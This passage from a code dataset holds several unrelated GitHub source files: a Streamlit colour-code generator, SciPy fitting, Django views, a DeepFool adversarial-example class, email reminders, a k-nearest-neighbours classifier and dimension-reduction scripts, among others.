openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[{\"role\": \"user\", \"content\": prompt}],\n functions=[\n {\n \"name\": \"hexcode_generator\",\n \"description\": \"Generate hexcode which will go well with the entered hexcode or color\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"hexcode\": {\n \"type\": \"string\",\n \"description\" : \"Generated Hexcode\",\n },\n \n \"user_query\": {\n \"type\": \"string\",\n \"description\": \"Answers any question by the user\"\n }\n\n }\n }\n }\n\n ],\n function_call= \"auto\",\n )\n except Exception as e:\n print(f\"An error occurred while generating response: {e}\")\n return None\n\n arguments = json.loads(completion.choices[0].message.function_call[\"arguments\"])\n message = arguments.get(\"hexcode\", \"Could not generate hexcode\")\n return message\n\n# EXECUTION OF THE PROGRAM STARTS HERE\n\nst.title(\"Hexcode Generator\")\nst.info(\"Enter a color or hexcode to continue\")\n\n# Storing the chat\nif 'generated' not in st.session_state:\n st.session_state['generated'] = []\n\nif 'past' not in st.session_state:\n st.session_state['past'] = []\n\ndef get_text():\n input_text = st.text_input(\"You: \", \"\", key=\"input\")\n return input_text\n\nprompt = get_text()\n\nif prompt:\n output = generate_response(prompt)\n if output is None:\n st.error(\"An error occurred while generating hexcode. Please try again.\")\n else:\n st.session_state.past.append(prompt)\n st.session_state.generated.append(output)\n\nif st.session_state['generated']:\n for i in range(len(st.session_state['generated'])-1,-1,-1):\n message(st.session_state['generated'][i], key = str(i))\n message(st.session_state['past'][i], is_user =True, key=str(i)+ '_user')\n","repo_name":"cumbersomeamir/hexcode-generator","sub_path":"hexcode-errorhandled.py","file_name":"hexcode-errorhandled.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5220933263","text":"\n# coding: utf-8\n\n# # Scipy: Scientific Python package\n\n# In[7]:\n\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nget_ipython().magic('matplotlib nbagg')\n\n\n# ## Optimization\n\n# In[4]:\n\nfrom scipy import optimize\n\n\n# In[28]:\n\ndef fonc(x, a = 1, b = 1):\n return np.exp(- a * x) * np.cos( b * x)\n\n\n# In[89]:\n\n# Target values:\na, b = 0.5, 4. 
# Ces valeurs sont inconnues !\nNp = 60\nxs = np.linspace(0., 5., Np)\nys = fonc(xs, a=a, b=b) + np.random.normal(loc = 0., scale = 0.5, size = Np)\nplt.figure()\nplt.plot(xs, ys, \"or--\", label = \"target\")\nplt.legend()\nplt.grid()\nplt.show()\n\n\n# In[40]:\n\ndef error(X):\n a, b = X\n y = fonc(xs, a=a, b=b)\n errors = y - ys\n return errors\n\nX0 = [0, 0] # Start point \nsol = optimize.leastsq(error, X0, maxfev = 10000)\nXf = sol[0] # Final values\nXf\naf, bf = Xf\naf, bf\n\n\n# In[90]:\n\nplt.figure()\nplt.plot(xs, ys, \"or\", label = \"target\")\nplt.plot(xs, fonc(xs, af, bf), \"b-\", label = \"solution\")\nplt.legend()\nplt.grid()\nplt.show()\n\n\n# In[96]:\n\nva = np.linspace(0.1, 2, 200)\nvb = np.linspace(-10., 10, 200)\nVa, Vb = np.meshgrid(va, vb)\n\n\n# In[97]:\n\nE = np.zeros_like(Va)\nNl, Nc = Va.shape\nfor i in range(Nl):\n for j in range(Nc):\n E[i, j] = ((fonc(xs, Va[i,j], Vb[i, j]) - ys)**2).sum()\n\n\n# In[98]:\n\nfrom matplotlib import cm\nplt.figure()\nplt.contourf(Va, Vb, np.log(E), 20, cmap = cm.jet)\ncbar = plt.colorbar()\nplt.contour(Va, Vb, np.log(E), 20, \n colors = \"black\", \n linewidths = .5)\nplt.xlabel(\"a\")\nplt.ylabel(\"b\")\nplt.title(\"Error, $\\log E = \\sum_i (y_i-y_{zi})^2$\")\ncbar.set_label(\"$E$\")\nplt.savefig(\"Error.pdf\")\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"lcharleux/Python_SISEO_1718","sub_path":"day3/scipy.py","file_name":"scipy.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6116853997","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom funds.models.project import Project\nfrom funds.models.rating import Rating\nfrom funds.models.projectPicture import ProjectPicture\nfrom funds.models.category import Category\nfrom django.db.models import Sum\nfrom django.db.models import Avg\n\n\ndef get_all_data():\n if Project.objects.all():\n projects_with_rating = Project.objects.all()\n project_list = []\n category_list = Category.objects.all()\n print(projects_with_rating)\n for p in projects_with_rating:\n rate = Rating.objects.filter(project=p).aggregate(Avg('rating'))\n if rate['rating__avg'] == None:\n rate['rating__avg'] = 0\n if ProjectPicture.objects.filter(project=p):\n img = ProjectPicture.objects.filter(project=p)[0]\n else:\n img = None\n dict = {\n 'project': p,\n 'rate': round(rate['rating__avg'], 2),\n 'img': img\n }\n project_list.append(dict)\n top_projects = sorted(project_list, key=lambda i: i['rate'], reverse=True)[:5]\n first_project = top_projects[0]\n top_projects.remove(top_projects[0])\n latest_projects = sorted(project_list, key=lambda r: r['project'].start_date, reverse=True)[:5]\n project_list = sorted(project_list, key=lambda r: r['project'].start_date, reverse=True)\n print(\"HERE NEW LIST OF 5 : \")\n print(latest_projects)\n context = {\n 'latest_projects': latest_projects,\n 'first_project': first_project,\n 'top_projects': top_projects,\n 'all_projects': project_list,\n 'category': category_list,\n 'Projects_by_category': None,\n }\n else:\n context = {\n 'latest_projects': [],\n 'first_project': None,\n 'top_projects': [],\n 'all_projects': [],\n 'category': [],\n 'Projects_by_category': None,\n }\n print(\"no data here \")\n return context\n\n\n@login_required\ndef index(request):\n if request.method == 'POST':\n projects_searched = []\n category_id = request.POST.get(\"category\", None)\n if category_id:\n 
Projects_by_category = Project.objects.prefetch_related('category').filter(category=category_id)\n print(Projects_by_category)\n context = get_all_data()\n context['Projects_by_category'] = Projects_by_category\n return render(request, 'funds/home.html', context)\n projects = Project.objects.all()\n result = {}\n searched = request.POST.get('searched').strip()\n if searched:\n for project in projects:\n if (searched in project.tags.names()) or (searched in project.title):\n projects_searched.append(project)\n return render(request, 'funds/search.html', {'searched': searched,\n 'projects': projects_searched})\n return render(request, 'funds/search.html',{})\n else:\n context = get_all_data()\n return render(request, 'funds/home.html', context)\n\n\ndef listCategoryProjects(request, category_id):\n projects_category = Project.objects.all().filter(category=category_id)\n context = {\n 'projects_category': projects_category,\n }\n return render(request,'funds/projectsByCat.html', context)\n\n\n\n","repo_name":"mohabrabie/EgyFund-Donation-System-by-Django","sub_path":"funds/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"2607509589","text":"from __future__ import absolute_import,print_function,division\n\nimport tensorflow as tf\nimport numpy as np\n\nclass DeepFool():\n\n def __init__(self,model,nb_candidate=5,overshoot=0.02,max_iter=200,clip_min=-1.0,clip_max=1.0):\n self.model=model\n self.nb_candidate=nb_candidate\n self.overshoot = overshoot\n self.max_iter = max_iter\n self.clip_min = clip_min\n self.clip_max = clip_max\n return\n\n\n def build_attack(self,pcm):\n self.pcm = pcm\n self.logits = self.model.get_logits()\n self.batch_iter = tf.placeholder(tf.int32)\n self.nb_classes = self.logits.get_shape().as_list()[-1]\n assert self.nb_candidate <= self.nb_classes, \\\n 'nb candidate should not be greater than nb_classes'\n \n self.preds = self.logits\n #self.preds = tf.reshape(tf.nn.top_k(self.logits,k = self.nb_candidate)[0],\n # [-1,self.nb_candidate])\n self.grads = tf.stack(jacobian_graph(self.preds[self.batch_iter,:],self.pcm,self.nb_classes), axis=1)\n return\n\n def attack(self,sess,sample,batch_size):\n adv_x = np.copy(sample)\n iteration = 0\n current = sess.run([self.model.get_probs()],feed_dict={self.pcm:sample})\n current = np.squeeze(current)\n if(current.ndim !=1):\n current = np.mean(current,axis=0)\n current = np.argmax(current)\n\n w = np.squeeze(np.zeros(sample.shape))\n r_tot = np.squeeze(np.zeros(sample.shape))\n original = current\n while(np.any(current==original) and iteration list:\n # for invalid input call self recursively to re-prompt user for data\n for i in range(len(prompt_arr) - stop):\n loop_prompt = start_str + prompt_arr[i]\n return_arr.append(input(loop_prompt))\n \n cases = intSanityCheck(return_arr)\n if (False in cases):\n return getReturnArray(prompt_arr, [], start_str)\n else:\n return return_arr\n\ndef promptStrBuilder()->list:\n # build prompt string\n result = []\n startStr = 'number of tests' \n midStr_Case1 = 'overall'\n midStr_Case2 = 'taken'\n endStr = 'this semester: '\n startEndArr = [startStr, endStr]\n midArr = [midStr_Case1, midStr_Case2]\n for i in range(len(midArr)):\n result.append(f'{startEndArr[0]} {midArr[i]} {startEndArr[1]}')\n result.append('score in percent for test: ')\n return result\n\n\n\ndef intSanityCheck(caseArr:list)->list:\n # to evaluate if the data recived is valid check if the 
data is an int\n returnArr = []\n for i in range(len(caseArr)):\n returnArr.append(caseArr[i].isnumeric())\n if returnArr[i] == False:\n try:\n float(caseArr[i].strip('-')) \n returnArr[i] = True\n except ValueError:\n returnArr[i] = False\n \n return returnArr\n\ndef promptFunctions(promptArr: list, returnArr, startStr:str='Please enter ')->list:\n # prompt user for data and return list of data\n # returnArr is list of data recived from user input\n returnArr = getReturnArray(promptArr, returnArr, startStr)\n \n # get the first & second elements of the list \n testTaken, testsTotal = returnArr[0:2]\n # strip any negative signs from the data not in the domain of the operation\n testTaken = testTaken.strip('-')\n testsTotal = testsTotal.strip('-')\n # \n # input already validated by getReturnArray, \n # take only 1-9 values, 10 term exams is unreasonable, cast to int \n returnArr = [int(testTaken[0]), int(testsTotal[0])]\n return returnArr\n\n","repo_name":"terpyPy/math125GradeCalc","sub_path":"calcLib/stringHandler.py","file_name":"stringHandler.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2585104403","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.alert import Alert\nimport time\nimport os\nimport keyboard\n\nclass case_use_unittest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r\".\\drivers\\chromedriver.exe\")\n\n def test_search_in_tabs(self):\n driver = self.driver\n localPage = 'file:///' + os.path.dirname(__file__) + '/statics/prompt.html'\n driver.get(localPage)\n element = driver.find_element_by_css_selector('.my-prompt')\n\n element.click()\n prompt = driver.switch_to.alert\n time.sleep(2)\n prompt.dismiss()\n time.sleep(2)\n\n element.click()\n prompt = driver.switch_to.alert\n time.sleep(1)\n keyboard.write('Hola')\n time.sleep(1)\n prompt.accept()\n time.sleep(50)\n\n\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == '__main__':\n case_use_unittest.main()\n","repo_name":"adancaym/pruebas-selenium","sub_path":"prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20928176827","text":"\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql import select, update\n\nfrom sql_app.crud.models import exerciseList\nfrom sql_app.workoutBuilder.schedule import update_schedule\n\nfrom ..database import settings, user_exercises, splits_sub_splits, user_misc, periods\n\n\n\ndef send_user_exercise_preference(db: Session, exerciseList: exerciseList):\n \n user_id = exerciseList.user_id\n\n for x in exerciseList.exercise_list:\n \n \n id= x.id\n max = x.max\n rc = x.ranked_choice\n fav = x.favorite\n active = x.active\n\n ins = user_exercises.insert().values(user_id = user_id, exercises_id = id, max = max, ranked_choice = rc, favorite =fav, active =active) \n result = db.execute(ins) \n \n db.commit()\n\ndef update_user_settings(db:Session, newSettings: settings):\n\n user_id = newSettings.user_id\n goal = newSettings.goal\n split = newSettings.split\n pd = newSettings.preffered_days\n cardio = newSettings.cardio\n \n stmt = update(settings).where(settings.c.user_id == newSettings.user_id).values(user_id = user_id ,goal = goal, split = split, preffered_days = pd, cardio = cardio)\n\n #print(update(settings))\n\n result = db.execute(stmt)\n\n 
db.commit()\n\n update_schedule(db, user_id)\n\ndef update_user_misc(db:Session, newMisc: user_misc):\n\n user_id = newMisc.user_id\n cp = newMisc.current_period\n vp = newMisc.variation_pref\n sl = newMisc.str_level\n \n \n stmt = update(user_misc).where(user_misc.c.user_id == newMisc.user_id).values(user_id = user_id,current_period = cp, variation_pref = vp,str_level=sl)\n\n #print(stmt)\n result = db.execute(stmt)\n\n db.commit()\n\n update_schedule(db, user_id)\n\n\n ","repo_name":"Joshmogil/training-app-project","sub_path":"main_dir/app_main_pyth/sql_app/crud/app_crud.py","file_name":"app_crud.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14763826541","text":"#!/usr/bin/env python\r\nimport sys\r\n# 程序功能:检查扩增子引物特异性\r\n# 输入:引物blast到ncbi代表性基因组上的结果,列表格式(-outfmt 6)\r\nlines = []\r\nwith open('primer-58-to-rep-all.m6', 'r') as fh:\r\n lines = [line.rstrip().split() for line in fh ]\r\n\r\namplicons = {} # 用于保存Forward引物的配对引物,键=forword primer,值=[amplicon]\r\nfor F in lines:\r\n if F[0][-2] != 'F':\r\n continue\r\n # 第一个引物所在的链\r\n primer1_strand = \"+\" if int(F[8]) < int(F[9]) else \"-\"\r\n\r\n # 第一个引物 基因组_开始_结束_引物名\r\n primer1_pos = \"_\".join([F[1], F[0], F[8], F[9]])\r\n\r\n # 循环列表,找出与前一个引物配对的引物\r\n for R in lines:\r\n if any([R[0]==F[0], R[1]!=F[1]]): # 引物名是自己,或者所在的基因组序列名不一样,都忽略\r\n continue\r\n\r\n primer2_strand = \"+\" if int(R[8]) < int(R[9]) else \"-\"\r\n # 条件1: 第1个引物在正链, 第2个引物在负链,第1个引物的起始位置小于第2个引物的起始位置(确保能扩出东西),扩增子长度 < 1000bp\r\n # 条件2: 第1个引物在负链, 第2个引物在正链,第1个引物的起始位置大于第2个引物的起始位置(确保能扩出东西),扩增子长度 < 1000bp\r\n cond1 = [primer1_strand==\"+\", primer2_strand==\"-\", int(R[8])>int(F[8]), int(R[8])-int(F[8])<1000]\r\n cond2 = [primer1_strand==\"-\", primer2_strand==\"+\", int(R[8])0 and te<16):\n #sender_name,recver_name,subject,text\n # em.sendEmail('电磁汪','mason','您有新的课程','课程内容等.......')\n text = \"课程名:%s\\n上课时间:%s\\n教室:%s\\n\\n\\n\\n祝好!\\n谢谢!\"%(x['course_name'],x['begin_time'],x['classroom'])\n self.ema.sendEmail(self.database.getUserEmail(int(x['course_id'])),'电磁汪','订阅者','15分钟后有课',text)\n index = self.course_list.index(x)\n print('格式1发送')\n del self.course_list[index]\n else:\n # print('line63else')\n time_cou = int(x['begin_time'][0:4])\n # print(time_cou)\n time_no = int(time.strftime('%H%M',time.localtime(time.time())))\n # print(time_no)\n te = time_cou - time_no\n \n if(56 > te and te >0):\n # print('line73::'+str(te))\n #sender_name,recver_name,subject,text\n # em.sendEmail('电磁汪','mason','您有新的课程','课程内容等.......')\n text = \"课程名:%s\\n上课时间:%s\\n教室:%s\\n\\n\\n\\n祝好!\\n谢谢!\"%(x['course_name'],x['begin_time'],x['classroom'])\n self.ema.sendEmail(self.database.getUserEmail(int(x['course_id'])),'电磁汪','订阅者','15分钟后有课',text)\n index = self.course_list.index(x)\n print('格式2发送')\n del self.course_list[index]\n\n #if(time_now-time_temp)\n\n\n\n\n def getTimeNow(self):\n time_now = int(time.strftime('%Y%m%d%H%M',time.localtime(time.time())))\n return time_now\n\n def getWeekToday(self):\n week_now = time.strftime('%a',time.localtime(time.time()))\n #Monday,Tuesday、Wednesday、Thursday、Friday、Saturday 、Sunday\n if('Mon'==week_now):\n return '01'\n if('Tue'==week_now):\n return '02'\n if('Wed'==week_now):\n return '03'\n if('Thu'==week_now):\n return '04'\n if('Fri'==week_now):\n return '05'\n if('Sat'==week_now):\n return '06'\n if('Sun'==week_now):\n return '07'\n\nif __name__ == \"__main__\": \n remind = Remind()\n self.loger.logRecord('系统关闭')\n 
self.ema.sendEmail(['zhaomangang@qq.com'],'电磁汪','mason','系统运行日志','系统关闭')\n","repo_name":"zhaomangang/CourseRemind","sub_path":"backgroundSystem/remind.py","file_name":"remind.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23981811026","text":"from flask import Flask, jsonify\n\nfrom handler import switch_pin\nfrom flask_restful import reqparse\n\nparser = reqparse.RequestParser()\nparser.add_argument('pin', type=int, help='Target GPIO pin', required=True)\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/switch\", methods=['POST'])\ndef index():\n args = parser.parse_args()\n pin = args['pin']\n error = switch_pin(pin)\n if error:\n return jsonify({\"message\": f\"Error: {error}\"}, 500)\n return jsonify({\"message\": \"Success\"}, 200)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"hernannieto89/pig.gpio_handler","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72635497733","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\nclass node:\r\n distance = 10000000000000000000\r\n nearestTuple = []\r\n\r\ndef readData():\r\n trainingData = pd.read_csv(\"TrainData.txt\", header=None).values.tolist()\r\n testData = pd.read_csv(\"TestData.txt\", header=None).values.tolist()\r\n return trainingData, testData\r\n\r\ndef nearestKth(tuple, trainingData, kth):\r\n output = []\r\n distanceList = euclideanDistance(tuple, trainingData)\r\n distanceList.sort(key = lambda x : x.distance)\r\n return distanceList[0:kth]\r\n\r\ndef euclideanDistance(tuple, trainingData):\r\n distanceList=[]\r\n for i in range(len(trainingData)):\r\n distance = 0\r\n for j in range(len(tuple) - 1):\r\n distance += math.pow(math.fabs(float(tuple[j]) - float(trainingData[i][j])), 2)\r\n n = node()\r\n n.distance = math.sqrt(distance)\r\n n.nearestTuple = trainingData[i]\r\n distanceList.append(n)\r\n return distanceList\r\n\r\ndef handleTie(classes, trainData):\r\n predictedClasses = sorted(classes.items(), key=lambda kv: kv[1], reverse=True)\r\n tie = True\r\n if len(predictedClasses) == 1:\r\n return predictedClasses[0][0]\r\n if (predictedClasses[0][1] != predictedClasses[1][1]):\r\n tie = False\r\n return predictedClasses[0][0]\r\n if tie == False:\r\n print(\"predicted : \", predictedClasses[0][0])\r\n else:\r\n tiedClasses = []\r\n tiedClasses.append(predictedClasses[0][0])\r\n for i in range(1, len(predictedClasses)):\r\n if (predictedClasses[i][1] != predictedClasses[i - 1][1]):\r\n break\r\n if predictedClasses[i][0] not in tiedClasses:\r\n tiedClasses.append(predictedClasses[i][0])\r\n for i in trainData:\r\n if i[-1] in tiedClasses:\r\n return i[-1]\r\n\r\ndef featuresOccurrence(nearElements):\r\n classes = {}\r\n for i in nearElements:\r\n if i.nearestTuple[-1] not in classes:\r\n classes.update({i.nearestTuple[-1]: 1})\r\n else:\r\n classes[i.nearestTuple[-1]] += 1\r\n return classes\r\n\r\nif __name__ == '__main__':\r\n trainingData, testData = readData()\r\n kELements = []\r\n accuracies = []\r\n g_max = 0\r\n k_max = 0\r\n file = open(\"report.txt\", 'a+')\r\n for k in range(1,10):\r\n correctCount = 0\r\n total = 0\r\n accuracy = 0.0\r\n print(\"K = \", k)\r\n file.write(\"K = \" + str(k) + \"\\r\\n\")\r\n for i in testData:\r\n nearestRows = nearestKth(i, trainingData, k)\r\n classes = 
featuresOccurrence(nearestRows)\r\n actualclass = i[-1]\r\n predictedClass = handleTie(classes, trainingData)\r\n if(actualclass == predictedClass):\r\n correctCount += 1 \r\n file.write(\"Predicted : \" + predictedClass+ \" \" + \"Actual : \" + actualclass+ \"\\r\\n\") \r\n total += 1\r\n accuracy = correctCount / total\r\n if accuracy > g_max:\r\n g_max = accuracy\r\n k_max = k\r\n kELements.append(k)\r\n accuracies.append(accuracy)\r\n \r\n file.write(\"Number of correctly classified instances : \" + str(correctCount) + \"\\r\\n\") \r\n file.write(\"Total number of instances : \" + str(total) + \"\\r\\n\") \r\n file.write(\"Accuracy : \" + str(accuracy) + \"\\r\\n\")\r\n file.write(\"----------------------------------------------------------------------------------\" + \"\\r\\n\")\r\n file.close()\r\n print(\"k Max =\", k_max)\r\n print(\"accuracy =\", g_max)\r\n plt.plot(kELements, accuracies, \"b.\")\r\n plt.locator_params(axis='x', nbins=len(kELements))\r\n plt.show()","repo_name":"mahmoudmohey97/Machine-learning-projects","sub_path":"knn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34663951666","text":"import ResponseEnvelop_pb2\nfrom Util import NetUtil\nfrom Requests import DownloadSettingsRequest_pb2\nfrom Responses import DownloadSettingsResponse_pb2\n\nclass DownloadSettings(object):\n\t\n\tdef __init__(self, raw_request, url, logger=None):\n\t\tself.request = raw_request\n\t\tself.url = url\n\t\tself.logger = logger\n\t\n\n\tdef _handle_response(self, response):\n\t\tresponse_envelop = ResponseEnvelop_pb2.ResponseEnvelop()\n\t\tresponse_envelop.ParseFromString(response.content)\n\t\tdownload_settings_response = DownloadSettingsResponse_pb2.DownloadSettingsResponse()\n\t\tdownload_settings_response.ParseFromString(response_envelop.responses[0])\n\t\tassert download_settings_response\n\n\t\tif self.logger:\n\t\t\tself.logger.info(\"Received DOWNLOAD_SETTINGS response:\\r\\n\")\n\t\t\tself.logger.debug(\"%s\" % download_settings_response)\n\t\treturn download_settings_response\n\n\t\n\tdef get(self):\n\t\tdata = self.request.SerializeToString()\n\n\t\tif self.logger:\n\t\t\tself.logger.info(\"Sending DOWNLOAD_SETTINGS request:\\r\\n\")\n\t\t\tself.logger.debug(\"%s\" % self.request)\n\t\treturn self._handle_response(NetUtil.request(\"POST\", self.url, data))","repo_name":"TalSk/PokemonGoClient","sub_path":"Actions/DownloadSettings.py","file_name":"DownloadSettings.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"70041980933","text":"## importing the required packages\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas\nfrom sklearn import datasets\nfrom sklearn import decomposition\nfrom sklearn import manifold\nimport umap\nfrom time import time\nimport random\nimport os, sys\n\n'''\n@author Pujan Joshi\n@date Feb 01, 2019\nThis code runs PCA, UMAP and tSNE.\nThis code can also draw scatter plot from results of PCA, UMAP and tSNE.\nThis code also writes resuts (X-Y info) to the files.\n\n****library install scripts***\n\npython -m pip install -U pip\npython -m pip install -U matplotlib\npython -m pip install pandas\npython -m pip install -U scikit-learn\npython -m pip install umap-learn\n\n****library install scripts end here***\n\n'''\nwork_dir = \"\"\ninputFilename = 
'C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/GSE155182/GSE155182_Normal_7m_liver.txt' # GSE115469_P5.csv\noutputFilename = ''\n\nRUN_PCA = True #True|False\nRUN_UMAP = True #True|False\nRUN_TSNE = True #True|False\nSHOW_PLOT = True #True|False\nTRANSPOSE = False #True|False #Transpose is needed if samples are rows\nn_iter = 700\ndelimiter = '\\t'; #'\\t' or ','\n\n#####\n##DO NOT CHANGE ANYTHING BELOW THIS LINE\n#####\n\nif work_dir != \"\":\n os.chdir(work_dir)\nprint(\"Current Working Directory \" , os.getcwd())\n\nhelp_msg = '''command line usage: \npython dimension_reduction.py \n-i (required)\n-o (default '', will auto-generate)\n-niter 700 (default)\n-delimiter \\\\t (default) || , \n-runPCA True || False (default)\n-runUMAP True || False (default)\n-runTSNE True || False (default)\n-showPlot True || False (default)\n-transpose True || False (default)\n'''\ndef parse_sys_argv(keys, help_msg=help_msg):\n args = sys.argv\n arguments = {}\n for key in keys:\n if key in args:\n arguments[key] = args[args.index(key) + 1]\n if len(arguments) == 0:\n print()\n print(help_msg)\n print()\n sys.exit()\n return arguments\n\n# # args_keys = [\"-i\", \"-o\", '-niter', '-delimiter', '-runPCA', '-runUMAP', '-runTSNE', '-showPlot', '-transpose', '-addLabel', '-labelFile', '-labelIndex']\n# # args = parse_sys_argv(args_keys)\n\n# # if '-i' in args:\n# # inputFilename = args['-i']\n# inputFilename = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/GSE119340/combined_subgroup.txt\"\n# # if '-o' in args:\n# outputFilename = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/GSE119340/combined_subgroup_test.txt\"\n# # if '-niter' in args:\n# n_iter = 200\n# if '-delimiter' in args:\n# delimiter = args['-delimiter']\n# if '-runPCA' in args:\n# # runPCA = args['-runPCA']\n# # RUN_PCA = False\n# # if runPCA.upper() == 'TRUE':\n# RUN_PCA = True\n# if '-runUMAP' in args:\n# # runUMAP = args['-runUMAP']\n# # RUN_UMAP = False\n# # if runUMAP.upper() == 'TRUE':\n# RUN_UMAP = True \n# if '-runTSNE' in args:\n# # runTSNE = args['-runTSNE']\n# # RUN_TSNE = False\n# # if runTSNE.upper() == 'TRUE':\n# RUN_TSNE = True \n# if '-showPlot' in args:\n# # showPlot = args['-showPlot']\n# # SHOW_PLOT = False\n# # if showPlot.upper() == 'TRUE':\n# SHOW_PLOT = True\n\n# if '-transpose' in args:\n# transpose = args['-transpose']\n# TRANSPOSE = False\n# if transpose.upper() == 'TRUE':\n# TRANSPOSE = True \nprint(\"start\")\nt = round(time())\nrand_int = random.randint(1,100)\no_filename_suffix = \"_\" + str(t) + \"_\" + str(rand_int)\n\nif outputFilename == '':\n outputFilename = inputFilename\n\ndot_pos = outputFilename.rfind(\".\")\nif dot_pos >= 0:\n outputFilename = outputFilename[: dot_pos]\n\no_filename = outputFilename + o_filename_suffix\n\n## Function to Scale and visualize the embedding vectors\nWRITE_TO_FILE = True\n\ndef plot_embedding(X, title=None):\n x_min, x_max = np.min(X, 0), np.max(X, 0)\n X = (X - x_min) / (x_max - x_min) \n plt.figure()\n ax = plt.subplot(111)\n for i in range(X.shape[0]):\n plt.text(X[i, 0], X[i, 1], \".\", \n fontdict={'weight': 'bold', 'size': 9})\n \n plt.xticks([]), plt.yticks([])\n if title is not None:\n plt.title(title)\nif TRANSPOSE:\n with open(inputFilename) as file:\n lis = [x.replace('\\n', '').split('\\t') for x in file]\n\n data = np.array(lis).T\n df = pandas.DataFrame(data=data[1:,:], index=data[1:,0], columns=data[0,:])\nelse:\n df = pandas.read_csv(inputFilename, delimiter=delimiter)\n\ncols = list(df.columns)[1:]\nX = 
df.values\nX = X[:, 1:]\nX = np.transpose(X)\ncols_t = np.array([cols])\nif RUN_PCA:\n ## Computing PCA\n print()\n print(\"Computing PCA projection...\")\n t0 = time()\n X_pca = decomposition.TruncatedSVD(n_components=2).fit_transform(X)\n #X_pca = decomposition.PCA(n_components=2).fit(X)\n tt_pca = round(time() - t0, 2)\n print(\"time taken by PCA:\", tt_pca, \"seconds\") \n if SHOW_PLOT:\n print(\"generating PCA plot...\")\n plot_title = \"PCA projection (time %.2fs)\" % (tt_pca)\n plot_embedding(X_pca, plot_title)\n\n if WRITE_TO_FILE:\n pca_filename = o_filename + '_pca.txt'\n print(\"writing PCA results to file named\", pca_filename)\n X_pca_2 = np.concatenate((cols_t.T, X_pca), axis=1)\n np.savetxt(pca_filename, X_pca_2, delimiter=delimiter, fmt='%s')\n\nif RUN_UMAP:\n ## Computing UMAP\n print()\n print(\"Computing UMAP projection...\")\n t0 = time()\n umap_dr = umap.UMAP()\n X_umap = umap_dr.fit_transform(X)\n tt_umap = round(time() - t0, 2)\n print(\"time taken by UMAP:\", tt_umap, \"seconds\")\n if SHOW_PLOT:\n print(\"generating umap scatter plot...\")\n plot_title = \"UMAP Projection (time %.2fs)\" % (tt_umap)\n plot_embedding(X_umap, plot_title)\n if WRITE_TO_FILE:\n umap_filename = o_filename + '_umap.txt'\n print(\"writing UMAP results to file named\", umap_filename)\n X_umap_2 = np.concatenate((cols_t.T, X_umap), axis=1)\n np.savetxt(umap_filename, X_umap_2, delimiter=delimiter, fmt='%s')\n \nif RUN_TSNE:\n ## Computing t-SNE\n print()\n print(\"Computing t-SNE with n_iter\", n_iter, \"..\")\n tsne = manifold.TSNE(init='pca', random_state=1, n_iter=n_iter)\n #tsne = manifold.TSNE()\n t0 = time()\n print(\"Transformation..\")\n X_tsne = tsne.fit_transform(X)\n tt_tsne = round(time() - t0, 2)\n print(\"time taken by tSNE:\", tt_tsne, \"seconds\")\n if SHOW_PLOT:\n print(\"generating t-SNE plot...\")\n plot_title = \"t-SNE (n_iter %d)(time %.2fs)\" % (n_iter, tt_tsne)\n plot_embedding(X_tsne, plot_title)\n if WRITE_TO_FILE:\n tsne_filename = o_filename + '_tsne_n' + str(n_iter) + '.txt'\n print(\"writing tSNE results to file named\", tsne_filename)\n X_tsne_2 = np.concatenate((cols_t.T, X_tsne), axis=1)\n np.savetxt(tsne_filename, X_tsne_2, delimiter=\"\\t\", fmt='%s')\n\nif SHOW_PLOT:\n print(\"displaing plots now ..\")\n plt.show()\n\n","repo_name":"Harry-Wang12/ctBuilder","sub_path":"code/Pyscript/SingleCellVisualization/dimension_reduction.py","file_name":"dimension_reduction.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37241891559","text":"import cv2\nimport numpy as np\n\ndef window_1d(im, n):\n h,w = im.shape\n imout = np.copy(im)\n for i in range(n,w-n):\n for j in range(h):\n l = 